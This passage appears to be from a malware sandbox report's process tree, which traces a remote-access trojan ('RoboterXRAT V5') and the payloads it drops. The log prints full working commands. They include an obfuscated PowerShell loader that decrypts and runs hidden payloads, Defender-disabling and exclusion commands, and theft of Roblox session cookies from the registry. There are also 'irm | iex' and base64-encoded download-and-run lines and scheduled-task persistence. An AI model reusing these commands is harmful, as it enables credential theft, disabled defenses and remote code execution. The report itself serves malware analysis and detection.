        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2584 -s 388
        20⤵
        
        PID:5980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:5908
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        19⤵
        
        PID:2112
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        Runs ping.exe
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        Drops file in Drivers directory
        
        PID:4708
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:5776
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        Views/modifies file attributes
        
        PID:940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:5528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        
        PID:5796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:5240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:1672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:4524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:3232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:5788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        
        PID:5408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:3584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:2684
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        16⤵
        
        PID:940
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        Runs ping.exe
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:4548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        9⤵
        
        PID:5632
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        
        PID:5976
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:6036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        8⤵
        
        PID:1060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2004
        
        C:\Windows\system32\net.exe
        
        net file
        9⤵
        
        PID:5332
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        10⤵
        
        PID:5368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        Executes dropped EXE
        
        PID:5600
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5644
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        11⤵
        Blocklisted process makes network request
        
        PID:5172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        12⤵
        Blocklisted process makes network request
        
        PID:5228
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        13⤵
        Executes dropped EXE
        
        PID:5796
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        10⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp155E.tmp.bat""
        10⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        11⤵
        Delays execution with timeout.exe
        
        PID:5932
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        11⤵
        Executes dropped EXE
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        Executes dropped EXE
        
        PID:5796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        7⤵
        
        PID:4092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:724
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:2708
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:2796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4044
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1812
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        Executes dropped EXE
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        Executes dropped EXE
        
        PID:180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1088
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2528
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:4180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3328
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:1564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4332
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1724
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3332
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:1920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
